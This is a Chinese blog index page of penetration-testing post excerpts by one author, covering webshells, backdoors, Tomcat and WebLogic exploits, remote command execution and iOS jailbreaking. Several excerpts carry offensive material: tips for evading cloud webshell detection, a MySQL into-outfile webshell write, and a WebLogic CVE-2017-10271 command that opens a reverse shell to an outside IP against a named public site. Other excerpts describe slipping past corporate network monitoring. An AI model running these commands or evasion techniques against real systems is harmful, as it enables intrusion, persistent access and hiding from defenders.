摘要: 最近在渗透测试阿里云服务器的时候,发现冰蝎被阿里云报webshell事件,和冰蝎的作者rebeyond是多年的老朋友了,交流了一下,在server.php服务端文件里面加入一些混淆字符就可以绕过监控了,大家自由发挥:如<html lang="en"> 或gif89a等宽字符 阅读全文
posted @ 2019-11-14 19:27 pt007 阅读(1739) 评论(0) 推荐(0) 编辑
摘要: 1、win2012下面访问文件共享的方法,由于2012只能通过administrator用户才能访问\\10.100.2.19\c$,其它管理组用户只能通过下列方式来访问: 2、命令行下安装winpcap的方法:用官方的winpcap是不行的。但是今天我发现用nmap里自带的winpcap-nmap 阅读全文
posted @ 2019-11-14 19:26 pt007 阅读(588) 评论(0) 推荐(0) 编辑
摘要: Webshell后门 XSS后门 远控后门&rootit(windows&LINUX) SSH后门 SHIFT终端服务器后门 系统用户账号克隆 SQL数据库扩展存储型后门 SQL数据库沙盒模式后门 Oralce/mysql自定义函数 Oralce的特权用户MYSQL数据库后门 文件捆绑型后门 下载系统用户密码HASH到本地进行破解金银钥匙 IIS/Tomcat/WEBLOGIC/APACHE应用型 阅读全文
posted @ 2019-11-14 19:11 pt007 阅读(360) 评论(0) 推荐(0) 编辑
摘要: 在前面的phpmyadmin漏洞利用专题中介绍了如何通过root账号来获取webshell,但在现实情况中,由于Mysql版本较高以及配置文件的缘故,往往无法直接通过root账号写入网站真实路径下获取webshell;通过研究发现其实可以通过一些方法绕过,同样可以获取webshell,下面将整个渗透 阅读全文
posted @ 2019-11-14 19:06 pt007 阅读(634) 评论(0) 推荐(0) 编辑
摘要: 程序名称:tomcat put上传漏洞利用程序v1.1,tomcat_put.py程序作者:pt007@vip.sina.com漏洞编号:CVE-2017-12615影响平台:Windows&Linux影响版本:Apache Tomcat 7.0.0 - 7.0.81程序用法:tomcat1.txt 阅读全文
posted @ 2019-11-14 18:59 pt007 阅读(740) 评论(0) 推荐(0) 编辑
摘要: 文章作者:pt007@vip.sina.comios10.3.3快速越狱指南:(1)进入爱思助手->刷机越狱->一键越狱: (2)安装并使用Shadowrocket配置socket5 VPN,然后Cydia就正常显示。192.168.1.158:1080(socket5代理)(3)进入cydia,更 阅读全文
posted @ 2019-11-14 18:57 pt007 阅读(1970) 评论(0) 推荐(0) 编辑
摘要: Android应用可能会使用sockets(TCP、UDP、UNIX)在应用间或者自身应用组件间进行通信,然而这种通信方式本身并没有提供任何身份认证。● 当开放端口绑定到0.0.0.0,那么任何IP都可以访问。● 当开放端口绑定到127.0.0.1,那么同一设备上的应用依然可以访问。一旦端口访问身份 阅读全文
posted @ 2019-11-14 18:54 pt007 阅读(625) 评论(0) 推荐(0) 编辑
摘要: https://github.com/nabla-c0d3/ssl-kill-switch2 //下载deb文件到本地通过爱思助手上传到iphone手机上面将手机连接电脑打开爱思助手--文件--文件系统(越狱)--路径:/var/root/Media/Cydia/AutoInstall(将deb格式 阅读全文
posted @ 2019-11-14 18:49 pt007 阅读(2570) 评论(0) 推荐(0) 编辑
摘要: //下面是关于各端口的说明和利用方法汇总: 25 //smtp (可尝试暴破,邮件伪造,vrfy/expn查询用户信息,使用stmp-user-enum工具自动跑) 110 //pop3 (可尝试暴破,明文密码,可以嗅探和arp欺骗来获取) 53 //dns域名解析 (允许区域传送,dns劫持,缓存投毒,欺骗以及各种基于dns隧道的远控) 111/1025/2049 //NFS网络文件系统(配置... 阅读全文
posted @ 2019-11-14 18:48 pt007 阅读(1022) 评论(0) 推荐(0) 编辑
摘要: 公司的一个渗透测试项目中发现使用了LDAP服务(389)做为用户认证的后台数据库,写了一个ldap匿名访问批量检测脚本 ldap2018.py: 阅读全文
posted @ 2019-11-14 18:45 pt007 阅读(991) 评论(0) 推荐(0) 编辑
摘要: 一、远程执行命令方式及对应端口:  IPC$+AT 445  PSEXEC 445  WMI 135  Winrm 5985(HTTP)&5986(HTTPS) 二、9种远程执行cmd命令的方法: 1.WMI执行命令方式,无回显: wmic /node:192.168.1.158 /user 阅读全文
posted @ 2019-11-14 14:51 pt007 阅读(23373) 评论(0) 推荐(1) 编辑
摘要: 1、指定参数base64加密替换功能插件:D:\plug_in\base64encode.py 2、为何要开发这个插件?参考:D:\plug_in\header包头数据自动替换插件\test1.py测试禅道的一个order by注入,发现提交的参数先使用base64加密后提交,由于是高版本mysql 阅读全文
posted @ 2019-11-14 14:45 pt007 阅读(1528) 评论(0) 推荐(0) 编辑
摘要: 1、 配置tomcat启动jconsole到1099端口的配置:参考文章:https://www.cnblogs.com/baihuitestsoftware/articles/6405580.html //可以将其设置为无密码访问: cd /opt/apache-tomcat-8.0.3/bin 阅读全文
posted @ 2019-11-14 14:43 pt007 阅读(1310) 评论(0) 推荐(0) 编辑
摘要: 文章作者:pt007@vip.sina.com1、前置知识:大家在渗透测试的时候经常会遇到时间戳(timestamp),时间戳用于防范burpsuite的抓包重放攻击,难倒了不少工具黑客,但是遇到代码级的黑客会如何解决这个问题呢?一言不合上代码,先给出生成时间戳的python代码: #!/user/ 阅读全文
posted @ 2019-11-14 14:38 pt007 阅读(843) 评论(0) 推荐(0) 编辑
摘要: 在渗透测试的时候,我们使用into outfile快速写入一句话后门时经常会出现写入不了的情况:update mysql.user set file_priv='Y' where user='root';flush privileges;select concat("'",0x3C3F7068702 阅读全文
posted @ 2019-11-14 14:26 pt007 阅读(1855) 评论(0) 推荐(0) 编辑
摘要: 发出来给安全的兄弟们批量检测使用,运行时截图: #coding=utf-8 import socket import time import re,os,sys,codecs type = 'utf-8' reload(sys) sys.setdefaultencoding(type) IpFile 阅读全文
posted @ 2019-11-14 14:25 pt007 阅读(1022) 评论(0) 推荐(0) 编辑
摘要: //linux版本执行反弹一句话: CVE-2017-10271_linux.py http://www.sohu.com:80/ /bin/sh -i >/dev/tcp/210.73.xx.1/8000 0<&1 2>&1 //win版本的利用方式: 我给个提示,下载exe程序,反弹一个cmds 阅读全文
posted @ 2019-11-14 14:23 pt007 阅读(225) 评论(0) 推荐(0) 编辑
摘要: 1、事件过程: 下面是9.26日出现断网事件的告警邮件内容,日期和时间加红:【事件告警】一级事件 北京XXx机房网络故障 事件 (1)业务影响开始时间:2018-9-26 15:50 (2)预计解决时间:未知 (3)影响范围:大数据,云平台业务,以及各产业应用,在线设备大范围掉线 (4)级别:一级 阅读全文
posted @ 2019-11-14 14:09 pt007 阅读(623) 评论(0) 推荐(1) 编辑
摘要: 文章作者:pt007@vip.sina.com 使用场景: 公司最近不知什么原因又开始折腾员工了,微信、QQ、百度网盘等等软件统统不让用了,公司在出口的地方通过部署了安全监控系统来实现上述功能,当我们使用不加密的socks5软件连接公网VPS的时候,会识别出正在使用socks5协议,然后的操作挺常规 阅读全文
posted @ 2019-11-14 14:06 pt007 阅读(7412) 评论(1) 推荐(0) 编辑
摘要: 整理人:pt007@vip.sina.com 1、准备环境 主机:window10 Phpstorm版本:2018.2.1 X64 Phpstudy版本:2018 PHP版本:5.6.27 php开发工具下载:https://www.php.cn/xiazai/gongju 2、安装步骤 2.1 安 阅读全文
posted @ 2019-11-14 13:48 pt007 阅读(1517) 评论(0) 推荐(0) 编辑